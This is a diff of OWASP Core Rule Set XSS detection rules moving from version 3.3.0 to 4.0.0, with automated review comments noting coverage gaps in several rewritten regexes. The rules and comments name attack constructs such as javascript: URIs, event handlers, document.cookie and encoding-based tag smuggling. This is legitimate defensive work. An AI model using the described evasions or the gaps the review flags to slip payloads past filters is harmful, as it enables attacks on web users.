(?i)<[^0-9<>A-Z_a-z]*(?:[^\s\v\"'<>]*:)?[^0-9<>A-Z_a-z]*[^0-9A-Z_a-z]*?(?:s[^0-9A-Z_a-z]*?(?:c[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?t|t[^0-9A-Z_a-z]*?y[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e|v[^0-9A-Z_a-z]*?g|e[^0-9A-Z_a-z]*?t[^0-9>A-Z_a-z])|f[^0-9A-Z_a-z]*?o[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?m|d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?o[^0-9A-Z_a-z]*?g|m[^0-9A-Z_a-z]*?(?:a[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?q[^0-9A-Z_a-z]*?u[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?e|e[^0-9A-Z_a-z]*?t[^0-9A-Z_a-z]*?a[^0-9>A-Z_a-z])|(?:l[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?k|o[^0-9A-Z_a-z]*?b[^0-9A-Z_a-z]*?j[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?c[^0-9A-Z_a-z]*?t|e[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?b[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?d|a[^0-9A-Z_a-z]*?(?:p[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?t|u[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?o|n[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?t[^0-9A-Z_a-z]*?e)|p[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?m|i?[^0-9A-Z_a-z]*?f[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?e|b[^0-9A-Z_a-z]*?(?:a[^0-9A-Z_a-z]*?s[^0-9A-Z_a-z]*?e|o[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?y|i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?g[^0-9A-Z_a-z]*?s)|i[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?a?[^0-9A-Z_a-z]*?g[^0-9A-Z_a-z]*?e?|v[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?o)[^0-9>A-Z_a-z])|(?:<[0-9A-Z_a-z].*[\s\v/]|[\"'](?:.*[\s\v/])?)(?:background|formaction|lowsrc|on(?:a(?:bort|ctivate|d(?:apteradded|dtrack)|fter(?:print|(?:s
criptexecu|upda)te)|lerting|n(?:imation(?:cancel|end|iteration|start)|tennastatechange)|ppcommand|u(?:dio(?:end|process|start)|xclick))|b(?:e(?:fore(?:(?:(?:(?:de)?activa|scriptexecu)t|toggl)e|c(?:opy|ut)|editfocus|input|p(?:aste|rint)|u(?:nload|pdate))|gin(?:Event)?)|l(?:ocked|ur)|oun(?:ce|dary)|roadcast|usy)|c(?:a(?:(?:ch|llschang)ed|nplay(?:through)?|rdstatechange)|(?:ell|fstate)change|h(?:a(?:rging(?:time)?cha)?nge|ecking)|l(?:ick|ose)|o(?:m(?:mand(?:update)?|p(?:lete|osition(?:end|start|update)))|n(?:nect(?:ed|ing)|t(?:extmenu|rolselect))|py)|u(?:echange|t))|d(?:ata(?:(?:availabl|chang)e|error|setc(?:hanged|omplete))|blclick|e(?:activate|livery(?:error|success)|vice(?:found|light|(?:mo|orienta)tion|proximity))|i(?:aling|s(?:abled|c(?:hargingtimechange|onnect(?:ed|ing))))|o(?:m(?:a(?:ctivate|ttrmodified)|(?:characterdata|subtree)modified|focus(?:in|out)|mousescroll|node(?:inserted(?:intodocument)?|removed(?:fromdocument)?))|wnloading)|r(?:ag(?:drop|e(?:n(?:d|ter)|xit)|(?:gestur|leav)e|over|start)|op)|urationchange)|e(?:mptied|n(?:abled|d(?:ed|Event)?|ter)|rror(?:update)?|xit)|f(?:ailed|i(?:lterchange|nish)|o(?:cus(?:in|out)?|rm(?:change|input))|ullscreenchange)|g(?:amepad(?:axismove|button(?:down|up)|(?:dis)?connected)|et)|h(?:ashchange|e(?:adphoneschange|l[dp])|olding)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|put|valid))|key(?:down|press|up)|l(?:evelchange|o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|y)|m(?:ark|essage|o(?:use(?:down|enter|(?:lea|mo)ve|o(?:ut|ver)|up|wheel)|ve(?:end|start)?|z(?:a(?:fterpaint|udioavailable)|(?:beforeresiz|orientationchang|t(?:apgestur|imechang))e|(?:edgeui(?:c(?:ancel|omplet)|start)e|network(?:down|up)loa)d|fullscreen(?:change|error)|m(?:agnifygesture(?:start|update)?|ouse(?:hittest|pixelscroll))|p(?:ointerlock(?:change|error)|resstapgesture)|rotategesture(?:start|update)?|s(?:crolledareachanged|wipegesture(?:end|start|update)?))))|no(?:match|update)|o(?:(?:bsolet|(?:ff|n)lin)e|pen|verflow(?:changed)?)|p(?:a(?:ge(?:hid
e|show)|int|(?:st|us)e)|lay(?:ing)?|o(?:inter(?:down|enter|(?:(?:lea|mo)v|rawupdat)e|o(?:ut|ver)|up)|p(?:state|up(?:hid(?:den|ing)|show(?:ing|n))))|ro(?:gress|pertychange))|r(?:atechange|e(?:adystatechange|ceived|movetrack|peat(?:Event)?|quest|s(?:et|ize|u(?:lt|m(?:e|ing)))|trieving)|ow(?:e(?:nter|xit)|s(?:delete|inserted)))|s(?:croll(?:end)?|e(?:arch|ek(?:complete|ed|ing)|lect(?:ionchange|start)?|n(?:ding|t)|t)|how|(?:ound|peech)(?:end|start)|t(?:a(?:lled|rt|t(?:echange|uschanged))|k(?:comma|sessione)nd|op)|u(?:bmit|ccess|spend)|vg(?:abort|error|(?:un)?load|resize|scroll|zoom))|t(?:ext|ime(?:out|update)|o(?:ggle|uch(?:cancel|en(?:d|ter)|(?:lea|mo)ve|start))|ransition(?:cancel|end|run|start))|u(?:n(?:derflow|handledrejection|load)|p(?:dateready|gradeneeded)|s(?:erproximity|sdreceived))|v(?:ersion|o(?:ic|lum)e)change|w(?:a(?:it|rn)ing|ebkit(?:animation(?:end|iteration|start)|transitionend)|heel)|zoom)|ping|s(?:rc|tyle))[\x08-\n\f-\r ]*?=" \ "id:941160,\ phase:2,\ block,\ 
@@ -189,20 +207,20 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [NoScript InjectionChecker] Attributes injection # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:\W|^)(?:javascript:(?:[\s\S]+[=\\\(\[\.<]|[\s\S]*?(?:\bname\b|\\[ux]\d))|data:(?:(?:[a-z]\w+\/\w[\w+-]+\w)?[;,]|[\s\S]*?;[\s\S]*?\b(?:base64|charset=)|[\s\S]*?,[\s\S]*?<[\s\S]*?\w[\s\S]*?>))|@\W*?i\W*?m\W*?p\W*?o\W*?r\W*?t\W*?(?:\/\*[\s\S]*?)?(?:[\"']|\W*?u\W*?r\W*?l[\s\S]*?\()|\W*?-\W*?m\W*?o\W*?z\W*?-\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g[\s\S]*?:[\s\S]*?\W*?u\W*?r\W*?l[\s\S]*?\(" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)(?:\W|^)(?:javascript:(?:[\s\S]+[=\x5c\(\[\.<]|[\s\S]*?(?:\bname\b|\x5c[ux]\d))|data:(?:(?:[a-z]\w+/\w[\w+-]+\w)?[;,]|[\s\S]*?;[\s\S]*?\b(?:base64|charset=)|[\s\S]*?,[\s\S]*?<[\s\S]*?\w[\s\S]*?>))|@\W*?i\W*?m\W*?p\W*?o\W*?r\W*?t\W*?(?:/\*[\s\S]*?)?(?:[\"']|\W*?u\W*?r\W*?l[\s\S]*?\()|[^-]*?-\W*?m\W*?o\W*?z\W*?-\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g[^:]*?:\W*?u\W*?r\W*?l[\s\S]*?\(" \ "id:941170,\ phase:2,\ block,\ 
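Review bot: In the rewritten 941170 regex, the `-moz-binding` branch `[^-]*?-\W*?m\W*?o\W*?z\W*?-\W*?b…g[^:]*?:\W*?u\W*?r\W*?l[\s\S]*?\(` now requires `url` to follow the first colon after at most non-word characters, whereas the `@import` branch in the same regex keeps its explicit optional `(?:/\*[\s\S]*?)?` comment group before the quote or `url` alternatives, and the removed form `[\s\S]*?:[\s\S]*?\W*?u…` tolerated arbitrary text there. The two branches thus treat the same CSS-comment situation differently, which is either an oversight or an undocumented false-positive trade-off; if it is the latter, say so in the comment above the rule (or in regex-assembly/941170.ra), otherwise give the `-moz-binding` branch the same optional comment group as `@import`. The swap of `\\` for `\x5c` and of `\/` for `/` is equivalent and needs no comment. The 941170 action block continues outside this hunk.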
@@ -214,40 +232,41 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # -# [Blacklist Keywords from Node-Validator] -# https://raw.github.com/chriso/node-validator/master/validator.js +# [Deny List Keywords from Node-Validator] +# https://github.com/validatorjs/validator.js/ +# This rule has a stricter sibling 941181 (PL2) that covers the additional payload "-->" # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm document.cookie document.write .parentnode .innerhtml window.location -moz-binding .*?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).*?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i:.*?(?:@[i\x5c]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).*?(?:[(\x5c]|&#x?0*(?:40|28|92|5C);?)))" \ "id:941190,\ phase:2,\ block,\ 
@@ -267,17 +286,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'language-multi',\
 tag:'platform-multi',\
 tag:'attack-xss',\
+ tag:'xss-perf-disable',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:<.*[:]?vmlframe.*?[\s/+]*?src[\s/+]*=)" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i:<.*[:]?vmlframe.*?[\s/+]*?src[\s/+]*=)" \
 "id:941200,\
 phase:2,\
 block,\
@@ -289,17 +308,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:j|&#x?0*(?:74|4A|106|6A);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:a|&#x?0*(?:65|41|97|61);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:v|&#x?0*(?:86|56|118|76);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:a|&#x?0*(?:65|41|97|61);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:s|&#x?0*(?:83|53|115|73);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:c|&#x?0*(?:67|43|99|63);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:r|&#x?0*(?:82|52|114|72);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:i|&#x?0*(?:73|49|105|69);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:p|&#x?0*(?:80|50|112|70);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:t|&#x?0*(?:84|54|116|74);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?::|&(?:#x?0*(?:58|3A);?|colon;)).)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx 
(?i)(?:j|&#(?:0*(?:74|106)|x0*[46]A);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:a|&#(?:0*(?:65|97)|x0*[46]1);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:v|&#(?:0*(?:86|118)|x0*[57]6);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:a|&#(?:0*(?:65|97)|x0*[46]1);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:s|&#(?:0*(?:115|83)|x0*[57]3);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:c|&#(?:x0*[46]3|0*(?:99|67));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:r|&#(?:x0*[57]2|0*(?:114|82));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:i|&#(?:x0*[46]9|0*(?:105|73));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:p|&#(?:x0*[57]0|0*(?:112|80));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:t|&#(?:x0*[57]4|0*(?:116|84));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?::|&(?:#(?:0*58|x0*3A);?|colon;))." \ "id:941210,\ phase:2,\ block,\ 
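Review bot: In the new 941210 pattern the numeric character references for the letters of `javascript` now require a terminating semicolon, e.g. `(?:j|&#(?:0*(?:74|106)|x0*[46]A);)`, while the references for the whitespace groups `&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);)` and for the colon `(?:#(?:0*58|x0*3A);?|colon;)` in the same regex keep the `;?`, and the removed pattern had `;?` on every group. Narrowing the digit sets to the correct decimal/hex pairs (74/106 and 4A/6A instead of the old mixed `74|4A|106|6A`) is a clear improvement, but the semicolon change is a coverage narrowing with no comment explaining it; unless the transformation chain (outside this hunk) already decodes these references before matching, the letter groups should keep `;?` like their neighbours, and if the stricter form is intended the regex-assembly source should say why. The same asymmetry appears in the rewritten 941220 in the next hunk.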
@@ -311,17 +330,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:v|&#x?0*(?:86|56|118|76);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:b|&#x?0*(?:66|42|98|62);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:s|&#x?0*(?:83|53|115|73);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:c|&#x?0*(?:67|43|99|63);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:r|&#x?0*(?:82|52|114|72);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:i|&#x?0*(?:73|49|105|69);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:p|&#x?0*(?:80|50|112|70);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:t|&#x?0*(?:84|54|116|74);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?::|&(?:#x?0*(?:58|3A);?|colon;)).)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx 
(?i)(?:v|&#(?:0*(?:118|86)|x0*[57]6);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:b|&#(?:0*(?:98|66)|x0*[46]2);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:s|&#(?:0*(?:115|83)|x0*[57]3);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:c|&#(?:x0*[46]3|0*(?:99|67));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:r|&#(?:x0*[57]2|0*(?:114|82));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:i|&#(?:x0*[46]9|0*(?:105|73));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:p|&#(?:x0*[57]0|0*(?:112|80));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:t|&#(?:x0*[57]4|0*(?:116|84));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?::|&(?:#(?:0*58|x0*3A);?|colon;))." \ "id:941220,\ phase:2,\ block,\ @@ -333,17 +352,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)]" \ "id:941290,\ phase:2,\ block,\ 
@@ -487,17 +506,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)). However, +# the characters where the brackets would be are ISO 8859-1 characters: +# - ¼: 0x00BC +# - ¾: 0x00BE +# - ¢: 0x00A2 +# +# And this is how the sequence looks in in US-ASCII: +# +# +# +# This enables an attacker to craft a string that will be delivered in a form that a browser will execute as script +# while being ignored by input filters. +# +# This rule looks for a start tag sequence that looks like "<...>" (checks for hex and plain to be sure). +# Because the bytes matched occur in many different languages encoded as multibyte characters (e.g. UTF-8) +# (e.g. German umlauts, Russian characters) this isn't very helpful and can cause many false positives. We, therefore, +# use a chained rule to also look for an end tag sequence that looks like "". Only if the chained rule matches will +# the request be blocked. +# +# This is of course still not perfect but should at least make it harder to hide most tags using this technique while +# requiring very specific patterns in a language to match, which should get rid of most false positives. +# These rules would, for example, not guard against an element without an end tag, e.g. "". 
+# +# US-ASCII on Wikipedia: https://en.wikipedia.org/wiki/ASCII +# ISO 8859-1 on Wikipedia: https://en.wikipedia.org/wiki/ISO/IEC_8859-1 -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \xbc[^\xbe>]*[\xbe>]|<[^\xbe]*\xbe" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx \xbc[^\xbe>]*[\xbe>]|<[^\xbe]*\xbe" \ "id:941310,\ phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:lowercase,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\ + t:none,t:lowercase,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\ msg:'US-ASCII Malformed Encoding XSS Filter - Attack Detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-tomcat',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + chain" + SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?:\xbc\s*/\s*[^\xbe>]*[\xbe>])|(?:<\s*/\s*[^\xbe]*\xbe)" \ + "t:none,t:lowercase,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # https://nedbatchelder.com/blog/200704/xss_with_utf7.html 
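Review bot: The new chained rule for 941310 evaluates its own target list independently of the first link, so the start-tag fragment and the end-tag fragment may sit in two different variables (a cookie and an argument, or two arguments) and the chain still blocks, while `capture`/`logdata` only report the start-tag match. That is inherent to ModSecurity chains and acceptable here, but it should be stated next to the chain so nobody reads it as a same-variable check: `# NOTE: the chained rule matches independently over the same targets; start and end tag need not be in the same variable.` Re-declaring `t:none,t:lowercase,t:urlDecode,t:htmlEntityDecode,t:jsDecode` on the second link is correct, since chained rules do not inherit transformations; dropping `t:urlDecodeUni` from both links keeps them consistent, though the reason for the drop is not given in the hunk.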
@@ -551,26 +606,26 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # Reported by Vladimir Ivanov # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \+ADw-.*(?:\+AD4-|>)|<.*\+AD4-" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx \+ADw-.*(?:\+AD4-|>)|<.*\+AD4-" \ "id:941350,\ phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\ + t:none,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\ msg:'UTF-7 Encoding IE XSS - Attack Detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-internet-explorer',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Defend against JSFuck and Hieroglyphy obfuscation of Javascript code @@ -594,7 +649,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # !+[] # ! [] -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ![!+ ]\[\]" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx ![!+ ]\[\]" \ "id:941360,\ phase:2,\ block,\ 
